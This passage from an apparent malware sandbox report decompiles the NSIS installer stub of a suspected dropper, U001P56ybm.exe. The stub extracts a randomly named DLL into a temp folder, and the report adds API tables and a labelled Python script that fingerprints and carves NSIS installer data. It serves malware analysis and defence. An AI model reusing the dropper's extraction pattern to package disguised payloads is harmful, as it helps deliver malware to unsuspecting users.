                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                    • String ID: foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 4050669955-2628631277
                    • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                    • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                    • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                    • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00403489() {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t20;
                    				signed int _t24;
                    				void* _t28;
                    				void* _t30;
                    				int _t31;
                    				void* _t34;
                    				struct HINSTANCE__* _t37;
                    				int _t38;
                    				intOrPtr _t39;
                    				int _t42;
                    				intOrPtr _t59;
                    				char _t61;
                    				CHAR* _t63;
                    				signed char _t67;
                    				struct HINSTANCE__* _t75;
                    				CHAR* _t78;
                    				intOrPtr _t80;
                    				CHAR* _t85;
                    
                    				_t80 =  *0x42eb70; // 0x6bfe70
                    				_t20 = E00405C49(6);
                    				_t87 = _t20;
                    				if(_t20 == 0) {
                    					_t78 = 0x429fd8;
					"1033" = 0x7830; // stores the two-byte prefix "0x" at the start of the language buffer; the decompiler labels the buffer by its dumped contents, "1033"
                    					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                    					__eflags =  *0x429fd8;
                    					if(__eflags == 0) {
                    						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                    					}
                    					lstrcatA("1033", _t78);
                    				} else {
                    					E00405889("1033",  *_t20() & 0x0000ffff);
                    				}
                    				E0040373D(_t75, _t87);
                    				_t24 =  *0x42eb78; // 0x80
                    				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                    				 *0x42ebe0 = _t24 & 0x00000020;
                    				if(E004054FF(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                    					L16:
                    					if(E004054FF(_t95, _t84) == 0) {
                    						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                    					}
                    					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
                    					 *0x42e348 = _t28;
                    					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t30 = E0040373D(_t75, __eflags);
                    							__eflags =  *0x42ec00; // 0x0
                    							if(__eflags != 0) {
                    								_t31 = E00404D9B(_t30, 0);
                    								__eflags = _t31;
                    								if(_t31 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x42e32c; // 0x0
                    								if(__eflags == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x429fb0, 5); // executed
                    							_t37 = LoadLibraryA("RichEd20"); // executed
                    							__eflags = _t37;
                    							if(_t37 == 0) {
                    								LoadLibraryA("RichEd32");
                    							}
                    							_t85 = "RichEdit20A";
                    							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								GetClassInfoA(0, "RichEdit", 0x42e300);
                    								 *0x42e324 = _t85;
                    								RegisterClassA(0x42e300);
                    							}
                    							_t39 =  *0x42e340; // 0x0
                    							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                    							E0040140B(5);
                    							return _t42;
                    						}
                    						L22:
                    						_t34 = 2;
                    						return _t34;
                    					} else {
                    						_t75 =  *0x42eb60; // 0x400000
                    						 *0x42e314 = _t28;
                    						_v20 = 0x624e5f;
                    						 *0x42e304 = E00401000;
                    						 *0x42e310 = _t75;
                    						 *0x42e324 =  &_v20;
                    						if(RegisterClassA(0x42e300) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						_t12 =  &_v16; // 0x624e5f
                    						SystemParametersInfoA(0x30, 0, _t12, 0);
                    						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t75 =  *(_t80 + 0x48);
                    					if(_t75 == 0) {
                    						goto L16;
                    					}
                    					_t59 =  *0x42eb98; // 0x6c3bb4
                    					_t78 = 0x42db00;
                    					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                    					_t61 =  *0x42db00; // 0x71
                    					if(_t61 == 0) {
                    						goto L16;
                    					}
                    					if(_t61 == 0x22) {
                    						_t78 = 0x42db01;
                    						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                    					}
                    					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) { // compares the last four characters against ".exe" (see the lstrcmpiA reference in the APIs list)
                    						L15:
                    						E0040592B(_t84, E0040541E(_t78));
                    						goto L16;
                    					} else {
                    						_t67 = GetFileAttributesA(_t78);
                    						if(_t67 == 0xffffffff) {
                    							L14:
                    							E00405465(_t78);
                    							goto L15;
                    						}
                    						_t95 = _t67 & 0x00000010;
                    						if((_t67 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}
                    Block addresses for the listing above range from 0x0040348f to 0x00403733; the address of each API call is given in the APIs list below.

                    APIs
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                    • lstrlenA.KERNEL32(qdrjldxxem,?,?,?,qdrjldxxem,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\U001P56ybm.exe" ), ref: 00403565
                    • lstrcmpiA.KERNEL32(?,.exe,qdrjldxxem,?,?,?,qdrjldxxem,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                    • GetFileAttributesA.KERNEL32(qdrjldxxem), ref: 00403583
                    • LoadImageA.USER32 ref: 004035CC
                      • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                    • RegisterClassA.USER32 ref: 00403613
                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                    • CreateWindowExA.USER32 ref: 00403664
                    • ShowWindow.USER32(00000005,00000000), ref: 00403696
                    • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                    • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                    • GetClassInfoA.USER32 ref: 004036C2
                    • GetClassInfoA.USER32 ref: 004036CF
                    • RegisterClassA.USER32 ref: 004036D8
                    • DialogBoxParamA.USER32 ref: 004036F7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$qdrjldxxem
                    • API String ID: 914957316-3549551381
                    • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                    • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                    • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                    • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                    Uniqueness

                    Uniqueness Score: -1.00%
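
Two things in the listings above are what an analyst checks first when deciding how to unpack a sample like this one: E00403489 references the strings used by the Nullsoft installer (NSIS) exehead (the "_Nb" window class, RichEd20/RichEdit20A, Control Panel\Desktop\ResourceLocale, the "%s Setup" title), and E00402C0B (the next function below) opens the running image itself with GetModuleFileNameA and sizes it with GetFileSize, which is how the stub locates its embedded installer data. The Python script below is an added example for this page, not code from the report, from Joe Sandbox or from the sample; it fingerprints a file on those strings and then locates the NSIS first header so the installer data block can be carved for further analysis. The header layout (flags, 0xDEADBEEF, "NullsoftInst", two length fields) comes from the public NSIS sources rather than from this report; the 512-byte scan alignment, the three-hit threshold and the meaning of the second length field are assumptions marked in the code; and the input it runs on is a constructed image, not U001P56ybm.exe.

```python
import struct

# Indicator strings referenced by the decompiled stub on this page
# (E00403489 and E00402C0B); all are characteristic of the NSIS exehead.
NSIS_STUB_INDICATORS = (
    b"Error launching installer",
    b"Control Panel\\Desktop\\ResourceLocale",
    b".DEFAULT\\Control Panel\\International",
    b"RichEd20",
    b"RichEdit20A",
    b"_Nb",
)

# NSIS "firstheader" layout, taken from the NSIS sources (exehead/fileform.h);
# this is background knowledge, not something the report above shows:
#   uint32 flags; uint32 siginfo (0xDEADBEEF); char nsinst[12] ("NullsoftInst");
#   uint32 length_of_header; uint32 length_of_all_following_data
FIRSTHEADER_FMT = "<II12sII"
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)  # 28 bytes
NSIS_MAGIC = struct.pack("<I", 0xDEADBEEF) + b"NullsoftInst"
SCAN_ALIGN = 512  # assumption: the stub tests for the header at 512-byte block starts


def nsis_indicator_hits(data: bytes) -> list:
    """Return the indicator strings present in the image, in table order."""
    return [s.decode("ascii") for s in NSIS_STUB_INDICATORS if s in data]


def find_nsis_firstheader(data: bytes):
    """Locate the NSIS firstheader and bound the installer data block.

    Aligned scan first (mirroring the stub reading its own image in
    E00402C0B), then an unaligned fallback for images shifted by padding.
    Returns a dict, or None when no header is present.
    """
    pos = -1
    for off in range(0, len(data) - FIRSTHEADER_SIZE + 1, SCAN_ALIGN):
        if data[off + 4:off + 4 + len(NSIS_MAGIC)] == NSIS_MAGIC:
            pos = off
            break
    if pos < 0:
        idx = data.find(NSIS_MAGIC)
        if idx < 4 or idx - 4 + FIRSTHEADER_SIZE > len(data):
            return None
        pos = idx - 4
    flags, _sig, _nsinst, hdr_len, total_len = struct.unpack_from(FIRSTHEADER_FMT, data, pos)
    end = pos + total_len  # assumption: total_len is counted from the firstheader itself
    return {
        "offset": pos,
        "flags": flags,
        "length_of_header": hdr_len,
        "length_of_all_following_data": total_len,
        "truncated": end > len(data),  # file cut short, e.g. a partial download
        "archive": data[pos:min(end, len(data))],
    }


def triage(data: bytes) -> dict:
    """String fingerprint plus header search; three or more hits is the chosen threshold."""
    hits = nsis_indicator_hits(data)
    return {
        "indicator_hits": hits,
        "looks_like_nsis_stub": len(hits) >= 3,
        "firstheader": find_nsis_firstheader(data),
    }


def build_constructed_sample() -> bytes:
    """Constructed test image, not the analysed sample: a fake stub carrying four
    indicator strings, padded to 1024 bytes, then a firstheader and 100 bytes of
    dummy archive data, then 16 trailing bytes standing in for an overlay."""
    stub = bytearray(b"MZ" + b"\x00" * 62)
    stub += b"Error launching installer\x00RichEd20\x00RichEdit20A\x00_Nb\x00"
    stub += b"\x00" * (1024 - len(stub))
    payload = b"\xAA" * 100
    total = FIRSTHEADER_SIZE + len(payload)
    fh = struct.pack(FIRSTHEADER_FMT, 0, 0xDEADBEEF, b"NullsoftInst", 40, total)
    return bytes(stub) + fh + payload + b"\x00" * 16


if __name__ == "__main__":
    result = triage(build_constructed_sample())
    print(result["indicator_hits"], result["looks_like_nsis_stub"])
    print({k: v for k, v in result["firstheader"].items() if k != "archive"})
```

On a real file, read it in binary mode and pass the bytes to `triage()`; the `archive` slice is what to hand to an NSIS extractor, and `truncated` tells you whether the capture was cut short before the installer data ended.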

                    C-Code - Quality: 80%
                    			E00402C0B(void* __eflags, signed int _a4) {
                    				DWORD* _v8;
                    				DWORD* _v12;
                    				void* _v16;
                    				intOrPtr _v20;
                    				long _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				long _t43;
                    				signed int _t50;
                    				void* _t53;
                    				signed int _t54;
                    				void* _t57;
                    				intOrPtr* _t59;
                    				long _t60;
                    				signed int _t65;
                    				signed int _t67;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t77;
                    				intOrPtr _t80;
                    				long _t82;
                    				signed int _t85;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t90;
                    				signed int _t93;
                    				void* _t94;
                    
                    				_t82 = 0;
                    				_v12 = 0;
                    				_v8 = 0;
                    				_t43 = GetTickCount();
                    				_t91 = "C:\\Users\\hardz\\Desktop\\U001P56ybm.exe";
                    				 *0x42eb6c = _t43 + 0x3e8;
                    				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\U001P56ybm.exe", 0x400);
                    				_t89 = E00405602(_t91, 0x80000000, 3);
                    				_v16 = _t89;
                    				 *0x409010 = _t89;
                    				if(_t89 == 0xffffffff) {
                    					return "Error launching installer";
                    				}
                    				_t92 = "C:\\Users\\hardz\\Desktop";
                    				E0040592B("C:\\Users\\hardz\\Desktop", _t91);
                    				E0040592B(0x436000, E00405465(_t92));
                    				_t50 = GetFileSize(_t89, 0);
                    				__eflags = _t50;
                    				 *0x428b88 = _t50;
                    				_t93 = _t50;
                    				if(_t50 <= 0) {
                    					L24:
                    					E00402BB0(1);
                    					__eflags =  *0x42eb74 - _t82; // 0x8200
                    					if(__eflags == 0) {
                    						goto L29;
                    					}
                    					__eflags = _v8 - _t82;
                    					if(_v8 == _t82) {
                    						L28:
                    						_t53 = GlobalAlloc(0x40, _v24); // executed
                    						_t94 = _t53;
                    						_t54 =  *0x42eb74; // 0x8200
                    						E00403098(_t54 + 0x1c);
                    						_push(_v24);
                    						_push(_t94);
                    						_push(_t82);
                    						_push(0xffffffff);
                    						_t57 = E00402E44();
                    						__eflags = _t57 - _v24;
                    						if(_t57 == _v24) {
                    							__eflags = _v44 & 0x00000001;
                    							 *0x42eb70 = _t94;
                    							 *0x42eb78 =  *_t94;
                    							if((_v44 & 0x00000001) != 0) {
                    								 *0x42eb7c =  *0x42eb7c + 1;
                    								__eflags =  *0x42eb7c;
                    							}
                    							_t40 = _t94 + 0x44; // 0x44
                    							_t59 = _t40;
                    							_t85 = 8;
                    							do {
                    								_t59 = _t59 - 8;
                    								 *_t59 =  *_t59 + _t94;
                    								_t85 = _t85 - 1;
                    								__eflags = _t85;
                    							} while (_t85 != 0);
                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                    							 *(_t94 + 0x3c) = _t60;
                    							E004055C3(0x42eb80, _t94 + 4, 0x40);
                    							__eflags = 0;
                    							return 0;
                    						}
                    						goto L29;
                    					}
                    					E00403098( *0x414b78);
                    					_t65 = E00403066( &_a4, 4); // executed
                    					__eflags = _t65;
                    					if(_t65 == 0) {
                    						goto L29;
                    					}
                    					__eflags = _v12 - _a4;
                    					if(_v12 != _a4) {
                    						goto L29;
                    					}
                    					goto L28;
                    				} else {
                    					do {
                    						_t67 =  *0x42eb74; // 0x8200
                    						_t90 = _t93;
                    						asm("sbb eax, eax");
                    						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                    						__eflags = _t93 - _t70;
                    						if(_t93 >= _t70) {
                    							_t90 = _t70;
                    						}
                    						_t71 = E00403066(0x420b88, _t90); // executed
                    						__eflags = _t71;
                    						if(_t71 == 0) {
                    							E00402BB0(1);
                    							L29:
                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						__eflags =  *0x42eb74;
                    						if( *0x42eb74 != 0) {
                    							__eflags = _a4 & 0x00000002;
                    							if((_a4 & 0x00000002) == 0) {
                    								E00402BB0(0);
                    							}
                    							goto L20;
                    						}
                    						E004055C3( &_v44, 0x420b88, 0x1c);
                    						_t77 = _v44;
                    						__eflags = _t77 & 0xfffffff0;
                    						if((_t77 & 0xfffffff0) != 0) {
                    							goto L20;
                    						}
                    						__eflags = _v40 - 0xdeadbeef;
                    						if(_v40 != 0xdeadbeef) {
                    							goto L20;
                    						}
                    						__eflags = _v28 - 0x74736e49;
                    						if(_v28 != 0x74736e49) {
                    							goto L20;
                    						}
                    						__eflags = _v32 - 0x74666f73;
                    						if(_v32 != 0x74666f73) {
                    							goto L20;
                    						}
                    						__eflags = _v36 - 0x6c6c754e;
                    						if(_v36 != 0x6c6c754e) {
                    							goto L20;
                    						}
                    						_a4 = _a4 | _t77;
                    						_t87 =  *0x414b78; // 0x497ec
                    						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                    						_t80 = _v20;
                    						__eflags = _t80 - _t93;
                    						 *0x42eb74 = _t87;
                    						if(_t80 > _t93) {
                    							goto L29;
                    						}
                    						__eflags = _a4 & 0x00000008;
                    						if((_a4 & 0x00000008) != 0) {
                    							L16:
                    							_v8 = _v8 + 1;
                    							_t24 = _t80 - 4; // 0x409154
                    							_t93 = _t24;
                    							__eflags = _t90 - _t93;
                    							if(_t90 > _t93) {
                    								_t90 = _t93;
                    							}
                    							goto L20;
                    						}
                    						__eflags = _a4 & 0x00000004;
                    						if((_a4 & 0x00000004) != 0) {
                    							break;
                    						}
                    						goto L16;
                    						L20:
                    						__eflags = _t93 -  *0x428b88; // 0x497f0
                    						if(__eflags < 0) {
                    							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                    						}
                    						 *0x414b78 =  *0x414b78 + _t90;
                    						_t93 = _t93 - _t90;
                    						__eflags = _t93;
                    					} while (_t93 > 0);
                    					_t82 = 0;
                    					__eflags = 0;
                    					goto L24;
                    				}
                    			}

                    0x00402c13
                    0x00402c16
                    0x00402c19
                    0x00402c1c
                    0x00402c22
                    0x00402c33
                    0x00402c38
                    0x00402c4b
                    0x00402c50
                    0x00402c53
                    0x00402c59
                    0x00000000
                    0x00402c5b
                    0x00402c66
                    0x00402c6c
                    0x00402c7d
                    0x00402c84
                    0x00402c8a
                    0x00402c8c
                    0x00402c91
                    0x00402c93
                    0x00402d80
                    0x00402d82
                    0x00402d87
                    0x00402d8e
                    0x00000000
                    0x00000000
                    0x00402d90
                    0x00402d93
                    0x00402db7
                    0x00402dbc
                    0x00402dc2
                    0x00402dc4
                    0x00402dcd
                    0x00402dd2
                    0x00402dd5
                    0x00402dd6
                    0x00402dd7
                    0x00402dd9
                    0x00402dde
                    0x00402de1
                    0x00402df4
                    0x00402df8
                    0x00402e00
                    0x00402e05
                    0x00402e07
                    0x00402e07
                    0x00402e07
                    0x00402e0f
                    0x00402e0f
                    0x00402e12
                    0x00402e13
                    0x00402e13
                    0x00402e16
                    0x00402e18
                    0x00402e18
                    0x00402e18
                    0x00402e22
                    0x00402e28
                    0x00402e36
                    0x00402e3b
                    0x00000000
                    0x00402e3b
                    0x00000000
                    0x00402de1
                    0x00402d9b
                    0x00402da6
                    0x00402dab
                    0x00402dad
                    0x00000000
                    0x00000000
                    0x00402db2
                    0x00402db5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402c99
                    0x00402c9e
                    0x00402c9e
                    0x00402ca3
                    0x00402ca7
                    0x00402cae
                    0x00402cb3
                    0x00402cb5
                    0x00402cb7
                    0x00402cb7
                    0x00402cbb
                    0x00402cc0
                    0x00402cc2
                    0x00402dec
                    0x00402de3
                    0x00000000
                    0x00402de3
                    0x00402cc8
                    0x00402ccf
                    0x00402d4b
                    0x00402d4f
                    0x00402d53
                    0x00402d58
                    0x00000000
                    0x00402d4f
                    0x00402cd8
                    0x00402cdd
                    0x00402ce0
                    0x00402ce5
                    0x00000000
                    0x00000000
                    0x00402ce7
                    0x00402cee
                    0x00000000
                    0x00000000
                    0x00402cf0
                    0x00402cf7
                    0x00000000
                    0x00000000
                    0x00402cf9
                    0x00402d00
                    0x00000000
                    0x00000000
                    0x00402d02
                    0x00402d09
                    0x00000000
                    0x00000000
                    0x00402d0b
                    0x00402d11
                    0x00402d1a
                    0x00402d20
                    0x00402d23
                    0x00402d25
                    0x00402d2b
                    0x00000000
                    0x00000000
                    0x00402d31
                    0x00402d35
                    0x00402d3d
                    0x00402d3d
                    0x00402d40
                    0x00402d40
                    0x00402d43
                    0x00402d45
                    0x00402d47
                    0x00402d47
                    0x00000000
                    0x00402d45
                    0x00402d37
                    0x00402d3b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402d59
                    0x00402d59
                    0x00402d5f
                    0x00402d6b
                    0x00402d6b
                    0x00402d6e
                    0x00402d74
                    0x00402d76
                    0x00402d76
                    0x00402d7e
                    0x00402d7e
                    0x00000000
                    0x00402d7e

                    APIs
                    • GetTickCount.KERNEL32 ref: 00402C1C
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\U001P56ybm.exe,00000400), ref: 00402C38
                      • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405606
                      • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                    • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00402C84
                    Strings
                    • Inst, xrefs: 00402CF0
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                    • Error launching installer, xrefs: 00402C5B
                    • soft, xrefs: 00402CF9
                    • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                    • C:\Users\user\Desktop\U001P56ybm.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                    • "C:\Users\user\Desktop\U001P56ybm.exe" , xrefs: 00402C15
                    • Null, xrefs: 00402D02
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\U001P56ybm.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                    • API String ID: 4283519449-3040409799
                    • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                    • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                    • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                    • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E00401734(FILETIME* __ebx, void* __eflags) {
                    				void* _t33;
                    				void* _t41;
                    				void* _t43;
                    				FILETIME* _t49;
                    				FILETIME* _t62;
                    				void* _t64;
                    				signed int _t70;
                    				FILETIME* _t71;
                    				FILETIME* _t75;
                    				signed int _t77;
                    				void* _t80;
                    				CHAR* _t82;
                    				void* _t85;
                    
                    				_t75 = __ebx;
                    				_t82 = E004029E8(0x31);
                    				 *(_t85 - 8) = _t82;
                    				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                    				_t33 = E0040548B(_t82);
                    				_push(_t82);
                    				if(_t33 == 0) {
                    					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                    				} else {
                    					_push(0x409b78);
                    					E0040592B();
                    				}
                    				E00405B89(0x409b78);
                    				while(1) {
                    					__eflags =  *(_t85 + 8) - 3;
                    					if( *(_t85 + 8) >= 3) {
                    						_t64 = E00405C22(0x409b78);
                    						_t77 = 0;
                    						__eflags = _t64 - _t75;
                    						if(_t64 != _t75) {
                    							_t71 = _t64 + 0x14;
                    							__eflags = _t71;
                    							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                    						}
                    						asm("sbb eax, eax");
                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                    						__eflags = _t70;
                    						 *(_t85 + 8) = _t70;
                    					}
                    					__eflags =  *(_t85 + 8) - _t75;
                    					if( *(_t85 + 8) == _t75) {
                    						E004055E3(0x409b78);
                    					}
                    					__eflags =  *(_t85 + 8) - 1;
                    					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                    					__eflags = _t41 - 0xffffffff;
                    					 *(_t85 - 0x34) = _t41;
                    					if(_t41 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t85 + 8) - _t75;
                    					if( *(_t85 + 8) != _t75) {
                    						E00404CC9(0xffffffe2,  *(_t85 - 8));
                    						__eflags =  *(_t85 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                    						__eflags =  *0x42ebe8;
                    						goto L32;
                    					} else {
                    						E0040592B(0x40a378, 0x42f000);
                    						E0040592B(0x42f000, 0x409b78);
                    						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll",  *((intOrPtr*)(_t85 - 0x10)));
                    						E0040592B(0x42f000, 0x40a378);
                    						_t62 = E004051EC("C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll",  *(_t85 - 0x24) >> 3) - 4;
                    						__eflags = _t62;
                    						if(_t62 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t62 == 1;
                    							if(_t62 == 1) {
                    								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                    								L32:
                    								_t49 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(0x409b78);
                    								_push(0xfffffffa);
                    								E00404CC9();
                    								L29:
                    								_t49 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t49;
                    				}
                    				E00404CC9(0xffffffea,  *(_t85 - 8));
                    				 *0x42ec14 =  *0x42ec14 + 1;
                    				_push(_t75);
                    				_push(_t75);
                    				_push( *(_t85 - 0x34));
                    				_push( *((intOrPtr*)(_t85 - 0x1c)));
                    				_t43 = E00402E44(); // executed
                    				 *0x42ec14 =  *0x42ec14 - 1;
                    				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                    				_t80 = _t43;
                    				if( *(_t85 - 0x18) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
